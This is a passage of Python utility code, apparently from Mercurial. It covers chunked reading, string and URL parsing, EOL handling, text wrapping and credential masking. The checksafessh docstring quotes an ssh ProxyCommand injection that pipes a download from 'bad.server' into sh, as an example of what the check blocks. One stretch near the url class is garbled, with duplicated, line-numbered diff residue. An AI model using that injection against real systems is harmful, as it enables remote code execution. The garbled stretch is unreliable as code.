    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If l is omitted, read everything."""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

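# Editor's note: an illustrative sketch (not part of the original module)
# showing that chunkbuffer decouples read sizes from the sizes the
# underlying iterator happens to yield.
def _examplechunkbuffer():
    buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
    assert buf.read(4) == b'abcd'   # spans the first two chunks
    assert buf.read(10) == b'efgh'  # short read: the iterator ran dry
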
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, ``size``
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data).  Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

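# Editor's note: an illustrative sketch (not part of the original module);
# ``fp`` is any hypothetical object with a read() method, e.g. the result
# of posixfile().
def _examplefilechunkiter(fp):
    total = 0
    for chunk in filechunkiter(fp, size=65536, limit=1 << 20):
        total += len(chunk)         # at most 1 MiB is read in total
    return total
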
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

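# Editor's note: an illustrative sketch (not part of the original module)
# showing cappedreader treating the byte limit as EOF.
def _examplecappedreader():
    capped = cappedreader(io.BytesIO(b'abcdef'), 3)
    assert capped.read() == b'abc'  # only the first 3 bytes are visible
    assert capped.read() == b''     # past the cap reads like EOF
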
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            flags = 0
            if not casesensitive:
                flags = remod.I
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search
    elif pattern.startswith('literal:'):
        pattern = pattern[8:]

    match = pattern.__eq__

    if not casesensitive:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match

def shortuser(user):
    """Return a short representation of a user name or email address."""
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    f = user.find(' ')
    if f >= 0:
        user = user[:f]
    f = user.find('.')
    if f >= 0:
        user = user[:f]
    return user

def emailuser(user):
    """Return the user portion of an email address."""
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    return user

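# Editor's note: an illustrative sketch (not part of the original module)
# contrasting the two helpers above on a full author string.
def _exampleusernames():
    author = 'John Doe <john.doe@example.com>'
    assert emailuser(author) == 'john.doe'  # keeps the whole local part
    assert shortuser(author) == 'john'      # additionally cuts at the dot
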
def email(author):
    '''get email of author.'''
    r = author.find('>')
    if r == -1:
        r = None
    return author[author.find('<') + 1:r]

def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    return encoding.trim(text, maxlength, ellipsis='...')

def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

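# Editor's note: an illustrative sketch (not part of the original module).
# The unitcountfn() table above picks the largest matching unit with a
# precision that keeps roughly three significant digits. The literal
# results below assume the untranslated C locale, since _() may localize
# the format strings.
def _examplebytecount():
    assert bytecount(500) == '500 bytes'
    assert bytecount(1 << 20) == '1.00 MB'
    assert bytecount(150 * (1 << 20)) == '150 MB'
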
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity

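# Editor's note: an illustrative sketch (not part of the original module)
# of the EOL helpers; note that runs of CR before a LF collapse.
def _exampleeol():
    assert tolf(b'a\r\r\nb\n') == b'a\nb\n'
    assert tocrlf(b'a\nb\n') == b'a\r\nb\r\n'
    assert fromnativeeol(tonativeeol(b'x\n')) == b'x\n'
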
def escapestr(s):
    # call underlying function of s.encode('string_escape') directly for
    # Python 3 compatibility
    return codecs.escape_encode(s)[0]

def unescapestr(s):
    return codecs.escape_decode(s)[0]

def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))

def uirepr(s):
    # Avoid double backslash in Windows path repr()
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')

# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither the number of 'bytes' in any encoding nor the number of
        'characters' is appropriate for calculating terminal columns of
        a specified string.

        The original TextWrapper implementation uses the built-in 'len()'
        directly, so overriding is needed to use the width information
        of each character.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires a per-use decision to determine the width of such
        characters.
        """
        def _cutdown(self, ucstr, space_left):
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chunks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)

def wrap(line, width, initindent='', hangindent=''):
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    line = line.decode(pycompat.sysstr(encoding.encoding),
                       pycompat.sysstr(encoding.encodingmode))
    initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))

if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

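# Editor's note: an illustrative sketch (not part of the original module);
# ``fp`` is a hypothetical pipe or socket file object. iterfile() only
# takes the slower EINTR-safe path where the interpreter needs it.
def _exampleiterfile(fp):
    count = 0
    for line in iterfile(fp):
        count += 1                  # each line keeps its trailing '\n'
    return count
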
def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            return [pycompat.sysexecutable]
    return gethgcmd()

def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent waits on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # record just the pid; os.wait() returns a (pid, status) pair
        terminated.add(os.wait()[0])
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

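# Editor's note: an illustrative sketch (not part of the original module)
# expanding '%'-prefixed placeholders, with '%%' escaping the prefix.
def _exampleinterpolate():
    out = interpolate(b'%', {b'user': b'alice'},
                      b'hi %user, 100%% sure', escape_prefix=True)
    assert out == b'hi alice, 100% sure'
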
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

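# Editor's note: an illustrative sketch (not part of the original module):
# integers and integer strings pass through, service names are resolved.
def _examplegetport():
    assert getport(8080) == 8080
    assert getport('22') == 22
    # getport('http') would consult socket.getservbyname() and raise
    # error.Abort if the service database has no such entry
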
_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
             '0': False, 'no': False, 'false': False, 'off': False,
             'never': False}

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    return _booleans.get(s.lower(), None)

2760 _hextochr = dict((a + b, chr(int(a + b, 16)))
2766 _hextochr = dict((a + b, chr(int(a + b, 16)))
2761 for a in string.hexdigits for b in string.hexdigits)
2767 for a in string.hexdigits for b in string.hexdigits)
2762
2768
2763 class url(object):
2769 class url(object):
2764 r"""Reliable URL parser.
2770 r"""Reliable URL parser.
2765
2771
2766 This parses URLs and provides attributes for the following
2772 This parses URLs and provides attributes for the following
2767 components:
2773 components:
2768
2774
2769 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2775 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2770
2776
2771 Missing components are set to None. The only exception is
2777 Missing components are set to None. The only exception is
2772 fragment, which is set to '' if present but empty.
2778 fragment, which is set to '' if present but empty.
2773
2779
2774 If parsefragment is False, fragment is included in query. If
2780 If parsefragment is False, fragment is included in query. If
2775 parsequery is False, query is included in path. If both are
2781 parsequery is False, query is included in path. If both are
2776 False, both fragment and query are included in path.
2782 False, both fragment and query are included in path.
2777
2783
2778 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2784 See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLs
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and '?' in path:
            path, self.query = path.split('?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith('//'):
            parts = path[2:].split('/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
                # path of file:///d is /d
                # path of file:///d:/ is d:/, not /d:/
                if path and not hasdriveletter(path):
                    path = '/' + path

        if self.host and '@' in self.host:
            self.user, self.host = self.host.rsplit('@', 1)
            if ':' in self.user:
                self.user, self.passwd = self.user.split(':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (self.host and ':' in self.host and
            not (self.host.startswith('[') and self.host.endswith(']'))):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(':', 1)
            if not self.host:
                self.host = None

        if (self.host and self.scheme == 'file' and
            self.host not in ('localhost', '127.0.0.1', '[::1]')):
            raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

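    # Hedged usage sketch for authinfo() above (illustrative only; the
    # expected values are inferred from __bytes__ and authinfo, not taken
    # from the test suite):
    #
    #   u = url(b'https://joe:secret@example.com/repo')
    #   u.authinfo()
    #   -> ('https://example.com/repo',
    #       (None, ('https://example.com/repo', 'example.com'),
    #        'joe', 'secret'))
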
    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

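# Illustrative sketch of the check above (comment only; callers run this on
# user-supplied URLs before handing them to ssh):
#
#   checksafessh(b'ssh://host/path')                  # returns None
#   checksafessh(b'ssh://-oProxyCommand=evil/path')   # raises error.Abort
#
# The urlreq.unquote() call ensures percent-encoded leading dashes
# (e.g. 'ssh://%2D...') are caught as well.
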
def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return str(u)

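# Hedged usage sketch for the two helpers above (outputs inferred from
# url.__bytes__, not taken from the test suite):
#
#   hidepassword(b'http://joe:secret@host/repo')  -> 'http://joe:***@host/repo'
#   removeauth(b'http://joe:secret@host/repo')    -> 'http://host/repo'
#
# Note that removeauth() drops the user name as well, while hidepassword()
# keeps it and masks only the password.
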
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

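# Assuming unitcountfn() (defined earlier in this file) picks the first
# (factor, divisor, format) row with abs(count) >= factor * divisor, the
# table above renders a duration in the largest unit that keeps a readable
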